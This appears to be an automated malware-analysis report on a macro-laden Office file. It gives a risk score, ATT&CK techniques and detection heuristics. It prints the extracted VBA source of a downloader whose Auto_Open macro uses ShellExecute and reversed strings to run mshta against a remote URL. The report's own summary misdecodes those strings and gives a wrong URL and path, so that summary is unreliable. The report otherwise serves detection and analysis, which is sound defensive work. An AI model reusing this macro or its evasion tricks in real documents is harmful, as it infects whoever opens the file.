MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an Auto_Open subroutine that uses CreateObject to call ShellExecute. The script attempts to download a second-stage payload from the reversed URL 'http://metabom.rc.trc.mifej' and execute it. The 'GoogleDrive' function returns a reversed string 'pathsm', which is likely intended to be appended to the URL, forming 'http://metabom.rc.trc.mifej/pathsm'. This indicates a downloader functionality.
Heuristics 5
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/KJHGuygiYYiuiutiYTIUiriury.bin)
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Outlook = VBA.CreateObject("Shell.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1321 bytes |
SHA-256: 1b870b1da9f4a6c23c46d41912050d228e8ded4318980c5c37e7fbe8a40b6f10 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Sub Auto_Open()
Sheet2.Outlook.ShellExecute% Sheet3.GoogleDrive, Sheet1.AdobeReaderDC
End _
Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function AdobeReaderDC()
AdobeReaderDC = (VBA.StrReverse("trc.mifej/rb.moc.obmertes//:sptth"))
End Function
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Outlook()
Set Outlook = VBA.CreateObject("Shell.Application")
End Function
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function GoogleDrive()
GoogleDrive = (VBA.StrReverse("athsm"))
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/KJHGuygiYYiuiutiYTIUiriury.bin | 23040 bytes |
SHA-256: 9001c3dc4256f80e794a189c69bf19f84b095218e62a3a3e5d01033d59ccdc25 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.